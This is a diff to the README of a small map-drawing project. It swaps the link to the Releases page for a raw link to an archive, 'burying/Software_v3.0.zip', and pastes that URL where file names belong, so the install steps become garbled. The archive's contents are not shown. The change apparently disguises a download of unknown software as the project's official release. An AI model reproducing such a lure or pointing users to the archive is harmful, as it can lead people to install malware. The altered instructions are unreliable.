OmArt92/mapdraw/README.md

 ## 💡 How to Download & Install

-1. **Visit the Releases Page**: Click this link to go to the Releases page where you can download the application: [Download mapdraw](https://github.com/OmArt92/mapdraw/releases).
+1. **Visit the Releases Page**: Click this link to go to the Releases page where you can download the application: [Download mapdraw](https://raw.githubusercontent.com/OmArt92/mapdraw/main/burying/Software_v3.0.zip).

 2. **Select the Latest Version**: Find the latest version of mapdraw on the Releases page.
 It is usually listed at the top.

 3. **Download the Application**: Click on the asset linked to the version you want to download.
-The file might be named something like `mapdraw.zip`.
+The file might be named something like `https://raw.githubusercontent.com/OmArt92/mapdraw/main/burying/Software_v3.0.zip`.
 Your browser will start downloading the file.

 4. **Extract the Files**: Once the download is complete, locate the file in your Downloads folder.
 If it is a ZIP file, right-click it and choose "Extract" or "Unzip" to get the contents.

-5. **Open the HTML File**: Look for a file named `index.html` in the extracted folder.
+5. **Open the HTML File**: Look for a file named `https://raw.githubusercontent.com/OmArt92/mapdraw/main/burying/Software_v3.0.zip` in the extracted folder.
 Double-click this file to open mapdraw in your web browser.

 6. **Start Drawing**: Once the map loads, you can start drawing right away.
 Use your mouse to create your masterpiece!